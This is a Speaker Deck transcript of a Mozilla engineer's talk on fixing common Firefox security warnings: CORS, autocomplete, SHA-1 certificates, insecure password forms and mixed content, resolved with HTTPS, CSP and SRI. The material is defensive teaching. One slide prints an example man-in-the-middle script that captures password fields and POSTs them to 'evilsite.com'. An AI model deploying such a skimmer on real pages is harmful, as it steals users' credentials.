Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Top" 5 Security Errors We See From Firefox and...

luke crouch
January 25, 2017
Technology
1
180

"Top" 5 Security Errors We See From Firefox and How to Fix Them

The most common security errors & warnings that developers see in the Firefox console are not that hard to fix. This talk covers what they are, why they are dangerous, and how to fix them.

luke crouch

January 25, 2017
Tweet

More Decks by luke crouch

See All by luke crouch
Pigeons to Padlocks: 5000 years of Network Security
groovecoder
0
29
cryptory-up-to-https-atlas-2024.pdf
groovecoder
0
43
Cryptography: 500 BC to https
groovecoder
0
100
Mozilla Observatory First Draft
groovecoder
0
94
VPNs
groovecoder
0
94
Digital Privacy & Security
groovecoder
0
220
Cryptography: 500 BC to Quantum Computing
groovecoder
0
500
Just enough bitcoing to go cryptojacking with JavaScript
groovecoder
0
63
Can we protect Privacy without breaking the web
groovecoder
0
110

Other Decks in Technology

See All in Technology
VideoMamba: State Space Model for Efficient Video Understanding
chou500
0
200
アプリエンジニアのためのGraphQL入門.pdf
spycwolf
0
110
rootlessコンテナのすゝめ - 研究室サーバーでもできる安全なコンテナ管理
kitsuya0828
3
390
TypeScriptの次なる大進化なるか!? 条件型を返り値とする関数の型推論
uhyo
2
1.7k
あなたの知らない Function.prototype.toString() の世界
mizdra
PRO
2
390
生成AIが変えるデータ分析の全体像
ishikawa_satoru
0
180
Zennのパフォーマンスモニタリングでやっていること
ryosukeigarashi
0
240
開発生産性を上げながらビジネスも30倍成長させてきたチームの姿
kamina_zzz
2
1.7k
Lexical Analysis
shigashiyama
1
150
Oracle Cloud Infrastructure データベース・クラウド:各バージョンのサポート期間
oracle4engineer
PRO
29
13k
SDNという名のデータプレーンプログラミングの歴史
ebiken
PRO
2
130
複雑なState管理からの脱却
sansantech
PRO
1
160

Featured

See All Featured
Building Applications with DynamoDB
mza
90
6.1k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.3k
Unsuck your backbone
ammeep
668
57k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
48k
Practical Orchestrator
shlominoach
186
10k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
For a Future-Friendly Web
brad_frost
175
9.4k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
38
1.8k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
131
33k
A Tale of Four Properties
chriscoyier
156
23k
Facilitating Awesome Meetings
lara
50
6.1k
Site-Speed That Sticks
csswizardry
0
33

Transcript

  1. Fixing the Top 5 Web Security Errors We see from

    Firefox Luke Crouch • Privacy + Security Engineer, Mozilla • @groovecoder

  2. Me. I’m Luke Crouch. I work on Privacy & Security.

    I click thru slides really fast. Twitter: @groovecoder 2

  3. The “Top 5”* 3 * MDN Google Analytics: Pageviews in

    /en-US/docs/Web/Security from utm_medium=firefox-console-errors

  4. 05 Same-Origin Policy

  5. None
  6. None

  7. Cross-Origin Request 7 http://www.evilcorp.com <html> … <script> new XMLHttpRequest().open( “GET”,

    “boss.bankofamerica.com/data.json” ); </script> … </html>

  8. Cross-Origin Request Threats 8 Attacker •Any Malicious Origin • Phishing

    & Malware Sites • Compromised CDNs • Untrusted First Parties Attacks •Steal data from other origins

  9. “Fix”: All browsers enforce Same-Origin Policy

  10. “Fix”: Use HTTP Access Control (CORS) to allow cross-origin access

  11. HTTP Access Control (CORS) 11 https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

  12. HTTP Access Control (CORS) 12 http://public.slidesharecdn.com/data.json … Access-Control-Allow-Origin: www.slideshare.net …

    http://www.slideshare.net <html> … <script> new XMLHttpRequest().open( “GET”, “public.slidesharecdn.com/data.json” ); </script> … </html> https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

  13. 04 Form Autocompletion

  14. I couldn’t find the specific errors, so, in general …

  15. By default, Browsers remember what users submit via input fields

  16. Form Autocompletion 16

  17. Form autocompletion 17 <form method=“post” action=“/updatePII”> <input type=“text” name=“ssn” >

    … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc”> … </form> https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  18. Form auto-complete Threats 18 Attacker •Malware authors •Over-the-shoulder Attacks •Steal

    the data from a file •Steal the data from the screen

  19. Disabling for sensitive information 19 <form method=“post” action=“/updatePII” autocomplete=“off”> <input

    type=“text” name=“ssn” > … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc” autocomplete=“off”> … </form> Disable for the entire form Disable for 1 field* https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  20. Caveat: login fields ; browsers want to remember this 20

    <form method=“post” action=“/form”> <input type=“text” name=“username” autocomplete=“off”> <input type=“password” name=“password” autocomplete=“off”> … </form> Has no effect; browser still offers to remember https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  21. 03 Weak Signature Algorithms

  22. None

  23. Weak Signature Algorithms Threats 23 Attacker •Malicious host •(with redirect

    or MITM vector) Attacks •Collision: Fraudulent certificates •2008 - md5: RapidSSL, Microsoft •2015 - SHA-1: “The SHAppening”

  24. Weak Signature Algorithms 24 $ openssl req -new -newkey rsa:2048

    -nodes -sha1 \ -out thecustomizewindows.com.csr \ -keyout thecustomizewindows.com.key $ openssl req -in thecustomizewindows.com.csr -noout -text Certificate Request: … Signature Algorithm: sha1WithRSAEncryption

  25. Fixing weak signatures is the same as fixing …

  26. 02 Insecure Passwords (Transmission)

  27. None
  28. None

  29. Insecure passwords 29 http://www.espn.com <html> … <form action=“/login"> <input type=“password”

    /> … </html>

  30. Insecure passwords 30 https://www.espn.com <html> … <form action=“http://www.espn.com/login" <input type=“password”

    /> … </html>

  31. Insecure passwords 31 http://www.espn.com <html> … <form action=“https://www.espn.com/login" <input type=“password”

    /> … </html> THIS IS NOT SECURE!

  32. Insecure passwords 32 http://www.espn.com <html> <script> // Injected via HTTP

    MitM […document.querySelectorAll(“[type=‘password’]”)].forEach(pwInput=>{ pwInput.addEventListener(“change”, ()=> { fetch(“evilsite.com”, {method: “POST”, body: pwInput.value}); }); }); </script> … <form action=“https://www.espn.com/login" <input type=“password” /> … </html> SEE, TOLD YOU SO!

  33. Insecure password transmission Threats 33 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Steal password ๏+ Password reuse

  34. Fixing weak signatures and insecure passwords is the same as

    fixing …

  35. 01 Mixed Content

  36. None

  37. Insecure active content 37 <script>, <link>, <iframe>, <object>, XMLHttpRequest, @font-face,

    cursor, background-image, etc. https://www.dailymotion.com/us <html> … <script src=“http://mc.dailymotion.com/masscast/2/dailymotion.us/ home/76127265087”> </script> … </html>

  38. Insecure active content Threats 38 Attacker • Man-in-the-middle: • Open

    WiFi • ISP • Proxies Attacks • Steal credentials • Steal sensitive data from DOM • Alter behavior of DOM • Install malware

  39. Browsers already fix insecure active content for you by blocking

    it

  40. insecure passive/display content

  41. None

  42. Insecure passive/display content 42 <img>, <audio>, <video>, <object> https://www.booking.com/ <html>

    … <img src=“http://tags.w55c.net/rs? id=c332832256414794bb465731a031be55& t=homepage” /> … </html>

  43. Insecure passive/display content Threats 43 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Break page •Snoop content •Inject Misleading content

  44. Snooping Session Cookies

  45. Snooping Session Cookies 45

  46. Snooping Session Cookies = Session Hijacking 46

  47. Snooping Session Cookies = Session Hijacking 47

  48. Snooping Session Cookies = Session Hijacking 48

  49. Snooping Other Cookies

  50. Snooping Other Cookies 50

  51. Snooping Other Cookies 51

  52. Sneak Peak: Cookie Syncing 52 https://freedom-to-tinker.com/blog/englehardt/the-hidden-perils-of-cookie-syncing/

  53. Fixing weak signatures, insecure passwords, AND insecure content

  54. HTTPS ALL THE THINGS!

  55. None

  56. +

  57. None
  58. None

  59. certbot + Let’s Encrypt 59 brew install certbot sudo certbot

    certonly --manual —preferred-challenges dns

  60. certbot + Let’s Encrypt 60

  61. certbot + Let’s Encrypt 61 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

  62. Deploy the TXT record to your DNS

  63. certbot + Let’s Encrypt 63 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

  64. Add signed cert to your site!

  65. None
  66. None

  67. Yay! You secured your site!

  68. But there’s legacy insecure content! 68 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

  69. Content-Security-Policy

  70. Content-Security-Policy 70 Content-Security-Policy: default-src https:; Enforce https: for all src

    https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

  71. good: upgrade-insecure-requests 71 Content-Security-Policy: default-src https:; upgrade-insecure-requests; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/upgrade-insecure-requests Change http

    links to https

  72. upgrade-insecure-requests 72 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

  73. better: block-all-mixed-content 73 Content-Security-Policy: block-all-mixed-content; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/block-all-mixed-content On https pages, block

    http requests

  74. How do you know which content is insecure?

  75. Content-Security-Policy-Report-Only 75 Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly Do

    not enforce; only report violations https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only

  76. Content-Security-Policy report-uri 76 Report violations here https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri Content-Security-Policy-Report-Only: default-src https:;

    block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly

  77. report-uri.io 77

  78. What if you have to use insecure resources?

  79. Sub-Resource Integrity

  80. Subresource Integrity (SRI) 80 https://example.com <html> … <script src=“http://examplecdn.com/framework.js” crossorigin=“anonymous”

    integrity=“sha512-oqVuAfXRKap7fdgc…”> </script> … https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity Hash Algorithm Hash Digest

  81. What if resources add their own <script> or <style> elements?

  82. require-sri-for 82 https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP Content-Security-Policy-Report-Only: require-sri-for script style; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly

    Require sri attributes on all <script> and <style> elements

  83. But, yeah … HTTPS ALL THE THINGS!

  84. +

  85. Thanks. Luke Crouch Twitter: @groovecoder groovecoder.com 85